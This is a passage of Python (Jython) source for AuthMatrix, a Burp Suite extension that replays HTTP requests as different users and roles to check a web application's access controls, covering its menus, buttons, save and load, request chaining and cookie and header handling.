ok, host, port, tls, replaceHost = selfExtender.changeDomainPopup(service)
if ok and host:
if not port or not port.isdigit():
port = 443 if tls else 80
for m in messages:
if replaceHost:
request = self.replaceDomain(m._requestResponse, host)
else:
request = m._requestResponse.getRequest()
# TODO save the Response?
m._requestResponse = RequestResponseStored(selfExtender, host, int(port), "https" if tls else "http", request)
m.clearResults()
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
class actionSetToggleForRole(ActionListener):
def __init__(self, enabled):
self._enabled = enabled
def actionPerformed(self, e):
if selfExtender._selectedColumn >= 0:
messageIndexes = [selfExtender._db.getMessageByRow(rowNum)._index for rowNum in selfExtender._messageTable.getSelectedRows()]
for messageIndex in messageIndexes:
roleIndex = selfExtender._db.getRoleByColumn(selfExtender._selectedColumn, "m")._index
selfExtender._db.setToggleForRole(messageIndex, roleIndex, self._enabled)
selfExtender._selectedColumn = -1
selfExtender._messageTable.redrawTable()
# Message Table popups
messagePopup = JPopupMenu()
addPopup(self._messageTable,messagePopup)
toggleEnabled = JMenuItem("Disable/Enable Request(s)")
toggleEnabled.addActionListener(actionToggleEnableMessage())
messagePopup.add(toggleEnabled)
messageRun = JMenuItem("Run Request(s)")
messageRun.addActionListener(actionRunMessage())
messagePopup.add(messageRun)
toggleRegex = JMenuItem("Toggle Regex Mode (Success/Failure)")
toggleRegex.addActionListener(actionToggleRegex())
messagePopup.add(toggleRegex)
changeRegex = JMenuItem("Change Regexes")
changeRegex.addActionListener(actionChangeRegexes())
messagePopup.add(changeRegex)
changeDomain = JMenuItem("Change Target Domain")
changeDomain.addActionListener(actionChangeDomain())
messagePopup.add(changeDomain)
messageRemove = JMenuItem("Remove Request(s)")
messageRemove.addActionListener(actionRemoveMessage())
messagePopup.add(messageRemove)
messageHeaderPopup = JPopupMenu()
addPopup(self._messageTable.getTableHeader(),messageHeaderPopup)
roleRemoveFromMessageTable = JMenuItem("Remove Role")
roleRemoveFromMessageTable.addActionListener(actionRemoveColumn("m"))
messageHeaderPopup.add(roleRemoveFromMessageTable)
enableToggle = JMenuItem("Bulk Select Checkboxes")
enableToggle.addActionListener(actionSetToggleForRole(True))
messageHeaderPopup.add(enableToggle)
disableToggle = JMenuItem("Bulk Unselect Checkboxes")
disableToggle.addActionListener(actionSetToggleForRole(False))
messageHeaderPopup.add(disableToggle)
# User Table popup
userPopup = JPopupMenu()
addPopup(self._userTable,userPopup)
toggleEnabled = JMenuItem("Disable/Enable User(s)")
toggleEnabled.addActionListener(actionToggleEnableUser())
userPopup.add(toggleEnabled)
userRemove = JMenuItem("Remove Users(s)")
userRemove.addActionListener(actionRemoveUser())
userPopup.add(userRemove)
userHeaderPopup = JPopupMenu()
addPopup(self._userTable.getTableHeader(),userHeaderPopup)
removeColumnFromUserTable = JMenuItem("Remove")
removeColumnFromUserTable.addActionListener(actionRemoveColumn("u"))
userHeaderPopup.add(removeColumnFromUserTable)
# Chain Table popup
chainPopup = JPopupMenu()
addPopup(self._chainTable,chainPopup)
toggleEnabled = JMenuItem("Disable/Enable Chain(s)")
toggleEnabled.addActionListener(actionToggleEnableChain())
chainPopup.add(toggleEnabled)
chainRemove = JMenuItem("Remove Chain(s)")
chainRemove.addActionListener(actionRemoveChain())
chainPopup.add(chainRemove)
# request tabs added to this tab on click in message table
self._tabs = JTabbedPane()
# Add change listener to set currentDisplayedItem
class TabChangeListener(ChangeListener):
def stateChanged(self, e):
if type(e.getSource()) == JTabbedPane and e.getSource().getSelectedIndex()>=0:
selfExtender._currentlyDisplayedItem = e.getSource().getSelectedComponent()._requestResponse
self._tabs.addChangeListener(TabChangeListener())
# Button panel
buttons = JPanel()
self._runButton = JButton("Run", actionPerformed=self.runClick)
self._cancelButton = JButton("Cancel", actionPerformed=self.cancelClick)
self._newUserButton = JButton("New User", actionPerformed=self.getInputUserClick)
self._newRoleButton = JButton("New Role", actionPerformed=self.getInputRoleClick)
self._newHeaderButton = JButton("New Header", actionPerformed=self.newHeaderClick)
self._newChainButton = JButton("New Chain", actionPerformed=self.newChainClick)
self._newStaticValueButton = JButton("New Chain Source", actionPerformed=self.newStaticValueClick)
self._saveButton = JButton("Save", actionPerformed=self.saveClick)
self._loadButton = JButton("Load", actionPerformed=self.loadClick)
self._clearButton = JButton("Clear", actionPerformed=self.clearClick)
buttons.add(self._runButton)
buttons.add(self._cancelButton)
self._cancelButton.setEnabled(False)
separator1 = JSeparator(SwingConstants.VERTICAL)
separator1.setPreferredSize(Dimension(25,0))
buttons.add(separator1)
buttons.add(self._newUserButton)
buttons.add(self._newRoleButton)
buttons.add(self._newHeaderButton)
separator2 = JSeparator(SwingConstants.VERTICAL)
separator2.setPreferredSize(Dimension(25,0))
buttons.add(separator2)
buttons.add(self._newChainButton)
buttons.add(self._newStaticValueButton)
separator3 = JSeparator(SwingConstants.VERTICAL)
separator3.setPreferredSize(Dimension(25,0))
buttons.add(separator3)
buttons.add(self._saveButton)
buttons.add(self._loadButton)
buttons.add(self._clearButton)
# Top pane
firstPane = JSplitPane(JSplitPane.VERTICAL_SPLIT,roleScrollPane,messageScrollPane)
self._topPane = JSplitPane(JSplitPane.VERTICAL_SPLIT, firstPane, chainScrollPane)
bottomPane = JSplitPane(JSplitPane.VERTICAL_SPLIT, self._tabs, buttons)
# Main Pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT, self._topPane, bottomPane)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(firstPane)
callbacks.customizeUiComponent(self._topPane)
callbacks.customizeUiComponent(bottomPane)
callbacks.customizeUiComponent(messageScrollPane)
callbacks.customizeUiComponent(roleScrollPane)
callbacks.customizeUiComponent(chainScrollPane)
callbacks.customizeUiComponent(self._messageTable)
callbacks.customizeUiComponent(self._userTable)
callbacks.customizeUiComponent(self._chainTable)
callbacks.customizeUiComponent(self._tabs)
callbacks.customizeUiComponent(buttons)
self._splitpane.setResizeWeight(0.5)
firstPane.setResizeWeight(0.35)
self._topPane.setResizeWeight(0.85)
bottomPane.setResizeWeight(0.95)
# Handles checkbox, regex, and enabled coloring
# Must be below the customizeUiComponent calls
self._messageTable.setDefaultRenderer(Boolean, SuccessBooleanRenderer(self._messageTable.getDefaultRenderer(Boolean), self._db))
self._messageTable.setDefaultRenderer(str, RegexRenderer(self._messageTable.getDefaultRenderer(str), self._db))
self._userTable.setDefaultRenderer(str, UserEnabledRenderer(self._userTable.getDefaultRenderer(str), self._db))
self._userTable.setDefaultRenderer(Boolean, UserEnabledRenderer(self._userTable.getDefaultRenderer(Boolean), self._db))
self._chainTable.setDefaultRenderer(str, ChainEnabledRenderer(self._chainTable.getDefaultRenderer(str), self._db))
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register SendTo option
callbacks.registerContextMenuFactory(self)
return
##
## implement ITab
##
def getTabCaption(self):
return "AuthMatrix"
def getUiComponent(self):
return self._splitpane
def highlightTab(self):
currentPane = self._splitpane
previousPane = currentPane
while currentPane and not isinstance(currentPane, JTabbedPane):
previousPane = currentPane
currentPane = currentPane.getParent()
if currentPane:
index = currentPane.indexOfComponent(previousPane)
# TODO use old background instead of black (currently doesn't work)
#oldBackground = currentPane.getBackgroundAt(index)
currentPane.setBackgroundAt(index,self._db.BURP_ORANGE)
class setColorBackActionListener(ActionListener):
def actionPerformed(self, e):
currentPane.setBackgroundAt(index,Color.BLACK)
timer = Timer(5000, setColorBackActionListener())
timer.setRepeats(False)
timer.start()
##
## Creates the sendto tab in other areas of Burp
##
def createMenuItems(self, invocation):
def addRequestsToTab(e):
for messageInfo in messages:
requestInfo = self._helpers.analyzeRequest(messageInfo)
name = str(requestInfo.getMethod()).ljust(8) + requestInfo.getUrl().getPath()
# Grab regex from response
regex = "^HTTP/1\\.1 200 OK"
response = messageInfo.getResponse()
if response:
responseInfo=self._helpers.analyzeResponse(response)
if len(responseInfo.getHeaders()):
responseCodeHeader = responseInfo.getHeaders()[0]
regex = "^"+re.escape(responseCodeHeader)
# Must create a new RequestResponseStored object since modifying the original messageInfo
# from its source (such as Repeater) changes this saved object. MessageInfo is a reference, not a copy
messageIndex = self._db.createNewMessage(RequestResponseStored(self,requestResponse=messageInfo), name, regex)
self._messageTable.redrawTable()
self._chainTable.redrawTable()
self.highlightTab()
class UserCookiesActionListener(ActionListener):
def __init__(self, currentUser, extender):
self.currentUser=currentUser
self.extender = extender
def actionPerformed(self, e):
for messageInfo in messages:
cookieVal = ""
requestInfo = self.extender._helpers.analyzeRequest(messageInfo)
for header in requestInfo.getHeaders():
cookieStr = "Cookie: "
if header.startswith(cookieStr):
cookieVal = header[len(cookieStr):]
# Grab Set-Cookie headers from the responses as well
response = messageInfo.getResponse()
if response:
responseInfo = self.extender._helpers.analyzeResponse(response)
responseCookies = responseInfo.getCookies()
newCookies = "; ".join([x.getName()+"="+x.getValue() for x in responseCookies])
cookieVal = ModifyMessage.cookieReplace(cookieVal,newCookies)
self.currentUser._cookies = cookieVal
self.extender._userTable.redrawTable()
self.extender.highlightTab()
ret = []
messages = invocation.getSelectedMessages()
# Check if the messages in the target tree have a response
valid = True
if invocation.getInvocationContext() == invocation.CONTEXT_TARGET_SITE_MAP_TREE:
for selected in messages:
if not selected.getResponse():
valid = False
if valid:
menuItem = JMenuItem("Send request(s) to AuthMatrix");
menuItem.addActionListener(addRequestsToTab)
ret.append(menuItem)
if len(messages)==1:
# Send cookies to user:
for user in self._db.getUsersInOrderByRow():
menuItem = JMenuItem("Send cookies to AuthMatrix user: "+user._name);
menuItem.addActionListener(UserCookiesActionListener(user, self))
ret.append(menuItem)
return ret
##
## implement IMessageEditorController
## this allows our request/response viewers to obtain details about the messages being displayed
##
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
##
## Actions on Bottom Row Button Clicks
##
def getInputUserClick(self, e):
newUser = JOptionPane.showInputDialog(self._splitpane,"Enter New User:")
if newUser:
self._db.getOrCreateUser(newUser)
self._userTable.redrawTable()
# redraw Message Table since it adds a new SingleUser Role
self._messageTable.redrawTable()
self._chainTable.redrawTable()
def getInputRoleClick(self, e):
newRole = JOptionPane.showInputDialog(self._splitpane,"Enter New Role:")
if newRole:
self._db.getOrCreateRole(newRole)
self._userTable.redrawTable()
self._messageTable.redrawTable()
def newChainClick(self,e):
self._db.createNewChain()
self._chainTable.redrawTable()
def newHeaderClick(self, e):
self._db.addNewHeader()
self._userTable.redrawTable()
def newStaticValueClick(self, e):
newSV = JOptionPane.showInputDialog(self._splitpane,"Enter a label for the new Chain Source:")
if newSV:
self._db.addNewSV(newSV)
self._userTable.redrawTable()
self._chainTable.redrawTable()
def cancelClick(self,e):
self._runCancelled = True
self._cancelButton.setEnabled(False)
def saveClick(self, e):
# Update original requests with any user changes
self._messageTable.updateMessages()
returnVal = self._fc.showSaveDialog(self._splitpane)
if returnVal == JFileChooser.APPROVE_OPTION:
f = self._fc.getSelectedFile()
if f.exists():
result = JOptionPane.showConfirmDialog(self._splitpane, "The file exists, overwrite?", "Existing File", JOptionPane.YES_NO_OPTION)
if result != JOptionPane.YES_OPTION:
return
fileName = f.getPath()
# TODO Potential bug here. Check if the value being written is 0 before opening
# TODO add a try catch here?
jsonValue = self._db.getSaveableJson()
if jsonValue:
fileout = open(fileName,'w')
fileout.write(jsonValue)
fileout.close()
else:
# TODO popup errors instead of prints
print "Error: Save Failed. JSON empty."
# TODO currently this will save the config to burp, but not to a specific project
# Will also need an export and loadFromFile feature if this is ever implemented
# self._callbacks.saveExtensionSetting("AUTHMATRIX", self._db.getSaveableJson())
def loadClick(self,e):
returnVal = self._fc.showOpenDialog(self._splitpane)
if returnVal == JFileChooser.APPROVE_OPTION:
f = self._fc.getSelectedFile()
fileName = f.getPath()
filein = open(fileName,'r')
jsonText = filein.read()
filein.close()
# Check if this is an older state file; files compatible with v0.5.2 or greater are JSON and start with "{"
if not jsonText or jsonText[0] !="{":
warning = """
CAUTION:
Loading a saved configuration prior to v0.6.3 deserializes data into Jython objects.
This action may pose a security threat to the application.
Only proceed when the source and contents of this file are trusted.
Load Selected File?
"""
result = JOptionPane.showOptionDialog(self._splitpane,
warning, "Caution",
JOptionPane.YES_NO_OPTION,
JOptionPane.WARNING_MESSAGE,
None,
["OK", "Cancel"],
"OK")
if result != JOptionPane.YES_OPTION:
return
self._db.loadLegacy(fileName,self)
else:
self._db.loadJson(jsonText,self)
# TODO currently can load extension settings, but this is saved for Burp and not for the Project specifically
# self._db.loadJson(self._callbacks.loadExtensionSetting("AUTHMATRIX"),self)
self._userTable.redrawTable()
self._messageTable.redrawTable()
self._chainTable.redrawTable()
def clearClick(self,e):
result = JOptionPane.showConfirmDialog(self._splitpane, "Clear AuthMatrix Configuration?", "Clear Config", JOptionPane.YES_NO_OPTION)
if result == JOptionPane.YES_OPTION:
self._db.clear()
self._tabs.removeAll()
self._userTable.redrawTable()
self._messageTable.redrawTable()
self._chainTable.redrawTable()
def runClick(self,e):
t = Thread(target=self.runMessagesThread)
self._tabs.removeAll()
t.start()
def changeRegexPopup(self):
regexComboBox = JComboBox(self._db.arrayOfRegexes)
regexComboBox.setEditable(True)
failureModeCheckbox = JCheckBox()
panel = JPanel(GridBagLayout())
gbc = GridBagConstraints()
gbc.anchor = GridBagConstraints.WEST
firstline = JPanel()
firstline.add(JLabel("Select a Regex for all selected Requests:"))
secondline = JPanel()
secondline.add(regexComboBox)
thirdline = JPanel()
thirdline.add(failureModeCheckbox)
thirdline.add(JLabel("Regex Detects Unauthorized Requests (Failure Mode)"))
gbc.gridy = 0
panel.add(firstline,gbc)
gbc.gridy = 1
panel.add(secondline, gbc)
gbc.gridy = 2
panel.add(thirdline, gbc)
result = JOptionPane.showConfirmDialog(self._splitpane, panel, "Select Response Regex", JOptionPane.OK_CANCEL_OPTION)
value = regexComboBox.getSelectedItem()
if result == JOptionPane.CANCEL_OPTION or not value:
return None, None
return value, failureModeCheckbox.isSelected()
def changeDomainPopup(self, service):
hostField = JTextField(25)
portField = JTextField(25)
checkbox = JCheckBox()
replaceHostCheckbox = JCheckBox()
replaceHostCheckbox.setSelected(True)
errorField = JLabel("\n")
errorField.setForeground(Color.orange);
def isValidDomain(domain):
return re.match(r'^[a-zA-Z0-9-\.]+$', domain)
if service:
hostField.setText(service.getHost())
portField.setText(str(service.getPort()))
if service.getProtocol()=="https":
checkbox.setSelected(True)
class HttpsItemListener(ItemListener):
def itemStateChanged(self, e):
if e.getStateChange() == ItemEvent.SELECTED and portField.getText() == "80":
portField.setText("443")
elif e.getStateChange() == ItemEvent.DESELECTED and portField.getText() == "443":
portField.setText("80")
checkbox.addItemListener(HttpsItemListener())
class HostDocumentListener(DocumentListener):
def changedUpdate(self, e):
self.testHost()
def removeUpdate(self, e):
self.testHost()
def insertUpdate(self, e):
self.testHost()
def testHost(self):
domain = hostField.getText()
matches = isValidDomain(domain)
if not matches:
# NOTE Hacky way to fix layout when host is long
if len(domain)>40:
domain = domain[:40]+"..."
errorField.setText("Invalid host: "+domain)
else:
errorField.setText("\n")
hostField.getDocument().addDocumentListener(HostDocumentListener())
domainPanel = JPanel(GridBagLayout())
gbc = GridBagConstraints()
gbc.anchor = GridBagConstraints.WEST
firstline = JPanel()
firstline.add(JLabel("Specify the details of the server to which the request will be sent."))
secondline = JPanel()
secondline.add(JLabel("Host: "))
secondline.add(hostField)
thirdline = JPanel()
thirdline.add(JLabel("Port: "))
thirdline.add(portField)
fourthline = JPanel()
fourthline.add(checkbox)
fourthline.add(JLabel("Use HTTPS"))
fifthline = JPanel()
fifthline.add(replaceHostCheckbox)
fifthline.add(JLabel("Replace Host in HTTP header"))
sixthline = JPanel()
sixthline.add(errorField)
gbc.gridy = 0
domainPanel.add(firstline,gbc)
gbc.gridy = 1
domainPanel.add(secondline, gbc)
gbc.gridy = 2
domainPanel.add(thirdline, gbc)
gbc.gridy = 3
domainPanel.add(fourthline, gbc)
gbc.gridy = 4
domainPanel.add(fifthline, gbc)
gbc.gridy = 5
domainPanel.add(sixthline, gbc)
result = JOptionPane.showConfirmDialog(
self._splitpane,domainPanel, "Configure target details", JOptionPane.OK_CANCEL_OPTION)
cancelled = (result == JOptionPane.CANCEL_OPTION)
if cancelled or not isValidDomain(hostField.getText()):
return (False, None, None, False, False)
return (True, hostField.getText(), portField.getText(), checkbox.isSelected(), replaceHostCheckbox.isSelected())
##
## Methods for running messages and analyzing results
##
def lockButtons(self, running=True):
# Disable run button, enable cancel button
self._runButton.setEnabled(not running)
self._newUserButton.setEnabled(not running)
self._newRoleButton.setEnabled(not running)
self._newHeaderButton.setEnabled(not running)
self._newChainButton.setEnabled(not running)
self._newStaticValueButton.setEnabled(not running)
self._saveButton.setEnabled(not running)
self._loadButton.setEnabled(not running)
self._clearButton.setEnabled(not running)
self._cancelButton.setEnabled(running)
def runMessagesThread(self, messageIndexes=None):
self._db.lock.acquire()
try:
self.lockButtons()
self._runCancelled=False
# Update original requests with any user changes
self._messageTable.updateMessages()
self._db.clearAllChainResults()
indexes = messageIndexes
if not indexes:
indexes = self._db.getActiveMessageIndexes()
self.clearColorResults(indexes)
# Run in order of row, not by index
messagesThatHaveRun = []
for message in self._db.getMessagesInOrderByRow():
# Only run if message is in the selected indexes (NOTE: dependencies will be run even if not selected)
if message._index in indexes:
messagesThatHaveRun = self.runMessageAndDependencies(message._index, messagesThatHaveRun, [])
except:
traceback.print_exc(file=self._callbacks.getStderr())
finally:
self.lockButtons(False)
self._db.lock.release()
self._messageTable.redrawTable()
def runMessageAndDependencies(self, messageIndex, messagesThatHaveRun, recursionCheckArray):
messageEntry = self._db.arrayOfMessages[messageIndex]
updatedMessagesThatHaveRun = messagesThatHaveRun[:]
updatedRecursionCheckArray = recursionCheckArray[:]
if messageIndex in updatedRecursionCheckArray:
print "Error: Recursion detected in message chains: "+"->".join([str(i) for i in updatedRecursionCheckArray])+"->"+str(messageIndex)
elif (messageIndex not in updatedMessagesThatHaveRun
and messageEntry.isEnabled()
and messageIndex in self._db.getActiveMessageIndexes()):
updatedRecursionCheckArray.append(messageIndex)
for chainIndex in self._db.getActiveChainIndexes():
# Run any dependencies first
chainEntry = self._db.arrayOfChains[chainIndex]
if (messageIndex in chainEntry.getToIDRange()
and chainEntry.isEnabled()
and str(chainEntry._fromID).isdigit()
and int(chainEntry._fromID) >= 0):
updatedMessagesThatHaveRun = self.runMessageAndDependencies(int(chainEntry._fromID), updatedMessagesThatHaveRun, updatedRecursionCheckArray)
self.runMessage(messageIndex)
# print messageIndex
updatedMessagesThatHaveRun.append(messageIndex)
return updatedMessagesThatHaveRun
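# Reading aid (not in the original source): runMessageAndDependencies
# is a depth-first walk of the chain graph. recursionCheckArray holds
# the current DFS path and trips the recursion error above, while
# messagesThatHaveRun memoizes finished nodes so a dependency shared by
# several messages only runs once per pass.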
def runMessage(self, messageIndex):
# NOTE: this uses hacky threading tricks for handling timeouts
tempRequestResponse = []
index = 0
def loadRequestResponse(index, service, message):
# NOTE: tempRequestResponse is a list because of a threading issue:
# if this thread times out, it may still update tempRequestResponse later on
try:
tempRequestResponse[index] = self._callbacks.makeHttpRequest(service,message)
except java.lang.RuntimeException:
# Catches if there is a bad host
# TODO there may sometimes be an unhandled exception thrown in the stack trace here?
print "Runtime Exception"
return
except:
traceback.print_exc(file=self._callbacks.getStderr())
messageEntry = self._db.arrayOfMessages[messageIndex]
messageEntry.clearResults()
messageInfo = messageEntry._requestResponse
requestInfo = self._helpers.analyzeRequest(messageInfo)
reqBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
for userIndex in [userEntry._index for userEntry in self._db.getUsersInOrderByRow()]:
# Handle cancel button early exit here
if self._runCancelled:
return
userEntry = self._db.arrayOfUsers[userIndex]
# Only run if the user is enabled
if userEntry.isEnabled():
newHeaders = ModifyMessage.getNewHeaders(requestInfo, userEntry._cookies, userEntry._headers)
newBody = reqBody
# Replace with Chain
for toValue, chainIndex in userEntry.getChainResultByMessageIndex(messageIndex):
# Add transformers
chain = self._db.arrayOfChains[chainIndex]
toValue = chain.transform(toValue, self._callbacks)
toRegex = chain._toRegex
newBody = StringUtil.toBytes(ModifyMessage.chainReplace(toRegex,toValue,[StringUtil.fromBytes(newBody)])[0])
newHeaders = ModifyMessage.chainReplace(toRegex,toValue,newHeaders)
# Replace with SV
# toValue = SV, toRegex = toRegex
for chain in [self._db.arrayOfChains[i] for i in self._db.getActiveChainIndexes()]:
svName = chain.getSVName()
# If the Chain Source exists, and this message is affected, and the chain is enabled
if svName and messageIndex in chain.getToIDRange() and chain.isEnabled():
# get toValue for correct source
sourceUser = chain._sourceUser if chain._sourceUser>=0 else userIndex
# Check that sourceUser is active
if sourceUser in self._db.getActiveUserIndexes():
toValue = self._db.getSVByName(svName).getValueForUserIndex(sourceUser)
# Add transformers
toValue = chain.transform(toValue, self._callbacks)
toRegex = chain._toRegex
newBody = StringUtil.toBytes(ModifyMessage.chainReplace(toRegex,toValue,[StringUtil.fromBytes(newBody)])[0])
newHeaders = ModifyMessage.chainReplace(toRegex,toValue,newHeaders)
# Replace Custom Special Types (i.e. Random)
newBody = StringUtil.toBytes(ModifyMessage.customReplace([StringUtil.fromBytes(newBody)])[0])
newHeaders = ModifyMessage.customReplace(newHeaders)
# Construct and send a message with the new headers
message = self._helpers.buildHttpMessage(newHeaders, newBody)
# Run with threading to timeout correctly
tempRequestResponse.append(None)
t = Thread(target=loadRequestResponse, args = [index,messageInfo.getHttpService(),message])
t.start()
t.join(self._db.LOAD_TIMEOUT)
# Create default requestResponse without response
requestResponse = RequestResponseStored(self,
request=message,
httpService=messageInfo.getHttpService())
if t.isAlive():
print "ERROR: Request Timeout for Request #"+str(messageIndex)+" and User #"+str(userIndex)
elif tempRequestResponse[index]:
requestResponse = RequestResponseStored(self,requestResponse=tempRequestResponse[index])
messageEntry.addRunByUserIndex(userIndex, requestResponse)
# Get Chain Result
response = requestResponse.getResponse()
if not response:
print "ERROR: No HTTP Response for Request #"+str(messageIndex)+" and User #"+str(userIndex)
else:
response = StringUtil.fromBytes(response)
for chain in [self._db.arrayOfChains[c] for c in self._db.getActiveChainIndexes()]:
# This won't have issues with SV because the prefix never matches the index
if str(chain._fromID) == str(messageIndex) and chain.isEnabled():
# If a sourceUser is set, replace for all users' chain results
# Else, replace each user's chain results individually
replace = True
affectedUsers = [userEntry]
if str(chain._sourceUser).isdigit() and chain._sourceUser >= 0: # TODO (0.9): why .isdigit()? Can this line just be removed
if str(chain._sourceUser) == str(userIndex):
affectedUsers = self._db.getUsersInOrderByRow()
else:
replace = False
if replace:
result = ""
if chain._fromRegex:
match = re.search(chain._fromRegex, response, re.DOTALL)
if match and len(match.groups()):
result = match.group(1)
for toID in chain.getToIDRange():
for affectedUser in affectedUsers:
affectedUser.addChainResultByMessageIndex(toID, result, chain._index)
index +=1
# Grab all active roleIndexes that are checkboxed
activeCheckBoxedRoles = [roleIndex for roleIndex in messageEntry._roles.keys() if messageEntry._roles[roleIndex] and not self._db.arrayOfRoles[roleIndex].isDeleted()]
# Check Role Results of message
for roleIndex in self._db.getActiveRoleIndexes():
expectedResult = self.checkResult(messageEntry, roleIndex, activeCheckBoxedRoles)
messageEntry.setRoleResultByRoleIndex(roleIndex, expectedResult)
def clearColorResults(self, messageIndexArray = None):
if not messageIndexArray:
messageIndexes = self._db.getActiveMessageIndexes()
else:
messageIndexes = messageIndexArray
for messageIndex in messageIndexes:
messageEntry = self._db.arrayOfMessages[messageIndex]
messageEntry.clearResults()
self._messageTable.redrawTable()
def checkResult(self, messageEntry, roleIndex, activeCheckBoxedRoles):
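# A sketch of the intended semantics: for each enabled user that belongs to
# roleIndex (and to no other checkboxed role), the message regex must produce
# the expected outcome, i.e. a match when the role is checkboxed and no match
# otherwise (inverted when the regex is in failure mode). Returns False on
# the first user whose result deviates.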
for userEntry in self._db.getUsersInOrderByRow():
ignoreUser = False
# NOTE: When using failure regex, all users not in a checked role must see that regex
# if user is not in this role, ignore it
if not userEntry._roles[roleIndex]:
ignoreUser = True
elif not userEntry.isEnabled():
ignoreUser = True
else:
# If user is in any other checked role, then ignore it
for index in self._db.getActiveRoleIndexes():
if not index == roleIndex and userEntry._roles[index]:
if index in activeCheckBoxedRoles:
ignoreUser = True
if not ignoreUser:
if not userEntry._index in messageEntry._userRuns:
print ("Unexpected Error: Results not found for Request #"
+ str(messageEntry._index) + " and User #" + str(userEntry._index))
return False
requestResponse = messageEntry._userRuns[userEntry._index]
response = requestResponse.getResponse()
if not response:
# No Response: default to failed
return False
resp = StringUtil.fromBytes(response)
found = re.search(messageEntry._regex, resp, re.DOTALL)
roleChecked = roleIndex in activeCheckBoxedRoles
shouldSucceed = not roleChecked if messageEntry.isFailureRegex() else roleChecked
succeeds = found if shouldSucceed else not found
if not succeeds:
return False
return True
##
## Static methods to modify requests during runs
##
class ModifyMessage():
@staticmethod
def cookieReplace(oldCookieStr, newCookieStr):
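# Merges two "k=v; k2=v2" cookie strings, with newCookieStr taking precedence.
# Illustrative example of the expected behavior:
#   cookieReplace("a=1; b=2", "b=3") -> "b=3; a=1"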
previousCookies = oldCookieStr.replace(" ","").split(";")
newCookies = newCookieStr.replace(" ","").split(";")
newCookieVariableNames = []
for newCookie in newCookies:
# If it's a valid cookie
equalsToken = newCookie.find("=")
if equalsToken >= 0:
newCookieVariableNames.append(newCookie[0:equalsToken+1])
# Add all the old unchanged cookies
for previousCookie in previousCookies:
# If it's a valid cookie
equalsToken = previousCookie.find("=")
if equalsToken >= 0:
if previousCookie[0:equalsToken+1] not in newCookieVariableNames:
newCookies.append(previousCookie)
# Remove empty entries
newCookies = [x for x in newCookies if x]
return "; ".join(newCookies)
# Replaces headers/cookies with user's token
@staticmethod
def getNewHeaders(requestInfo, newCookieStr, newHeaders):
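# newHeaders is a list of full header lines (e.g. "X-Api-Key: abc", an
# illustrative value): each entry replaces an existing header with the same
# name or is appended if none exists; newCookieStr is merged into any
# existing Cookie header via cookieReplace above.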
ret = requestInfo.getHeaders()
headers = requestInfo.getHeaders()
# Handle Cookies
if newCookieStr:
replaceIndex = -1
cookieHeader = "Cookie:"
oldCookieStr = ""
# Find existing cookie header
for i in range(headers.size()):
header = headers[i]
if str(header).startswith(cookieHeader):
replaceIndex = i
oldCookieStr = str(header)[len(cookieHeader):]
newCookiesHeader = cookieHeader+" "+ModifyMessage.cookieReplace(oldCookieStr,newCookieStr)
if replaceIndex >= 0:
ret.set(replaceIndex, newCookiesHeader)
else:
ret.add(newCookiesHeader)
# Handle Custom Header
for newHeader in [x for x in newHeaders if x]:
replaceIndex = -1
colon = newHeader.find(":")
if colon >= 0:
for i in range(headers.size()):
header = headers[i]
# If the header already exists, replace it
if str(header).startswith(newHeader[0:colon+1]):
replaceIndex = i
if replaceIndex >= 0:
ret.set(replaceIndex, newHeader)
else:
ret.add(newHeader)
return ret
@staticmethod
def chainReplace(toRegex, toValue, toArray):
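# Substitutes toValue into the first capture group of toRegex. toArray is
# either a one-element list holding the body, or the list of header lines
# (joined with CRLF before matching). A sketch with an illustrative regex:
#   chainReplace("token=(.*?);", "NEW", ["id=1&token=OLD;x=2"])
#   -> ["id=1&token=NEW;x=2"]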
# TODO: clean up so that the input is headers+body and it's called only once
isBody = len(toArray)==1
if toRegex:
# BUG FIX: Geoff reported that if the regex ends at the newline on the last header,
# the regex fails. Hacky solution is to add extra newlines before the regex search
# and remove them after.
to = "\r\n".join(toArray)+"\r\n\r\n"
match = re.search(toRegex, to, re.DOTALL)
if match and len(match.groups()):
ret = (to[0:match.start(1)]+toValue+to[match.end(1):])
if ret[-4:] == "\r\n\r\n":
ret = ret[:-4]
if isBody:
return [ret]
else:
return ret.split("\r\n")
return toArray
## Method to replace custom special types in messages
@staticmethod
def customReplace(toArray):
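# e.g. "id=#{AUTHMATRIX:RANDOM}" becomes "id=4821" (illustrative; the four
# digits are random on every run)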
ret = ArrayList()
customPrefix = "#{AUTHMATRIX:"
for to in toArray:
toNew = to
if customPrefix in to:
if customPrefix+"RANDOM}" in to:
# This will produce a random 4 char numeric string
# Most common use case is for APIs that reject requests that are identical to a previous request
randomString = ''.join(random.choice(string.digits) for _ in range(4))
toNew = to.replace(customPrefix+"RANDOM}",randomString)
ret.add(toNew)
return ret
##
## DB Class that holds all configuration data
##
class MatrixDB():
def __init__(self):
# Holds all custom data
# NOTE: consider moving these constants to a different class
self.STATIC_USER_TABLE_COLUMN_COUNT = 2
self.STATIC_MESSAGE_TABLE_COLUMN_COUNT = 3
self.STATIC_CHAIN_TABLE_COLUMN_COUNT = 7
self.LOAD_TIMEOUT = 10.0
self.BURP_ORANGE = Color(0xff6633)
self.lock = Lock()
self.arrayOfMessages = ArrayList()
self.arrayOfRoles = ArrayList()
self.arrayOfUsers = ArrayList()
self.arrayOfChains = ArrayList()
self.deletedUserCount = 0
self.deletedRoleCount = 0
self.deletedMessageCount = 0
self.deletedChainCount = 0
self.arrayOfSVs = ArrayList()
self.headerCount = 0
self.arrayOfRegexes = []
# Returns the index of the user, whether it's new or not
def getOrCreateUser(self, name):
self.lock.acquire()
userIndex = -1
# Check if User already exists
for i in self.getActiveUserIndexes():
if self.arrayOfUsers[i]._name == name:
userIndex = i
# Add new User
if userIndex < 0:
userIndex = self.arrayOfUsers.size()
self.arrayOfUsers.add(UserEntry(userIndex,
userIndex - self.deletedUserCount,
name,
headers=[""]*self.headerCount))
# Add SingleUser Role
self.lock.release()
singleRoleIndex = self.getOrCreateRole(name, True)
self.lock.acquire()
# Check Role for user
# Add all existing roles as unchecked except the singleUser
for roleIndex in self.getActiveRoleIndexes():
prechecked=False
if roleIndex == singleRoleIndex:
prechecked=True
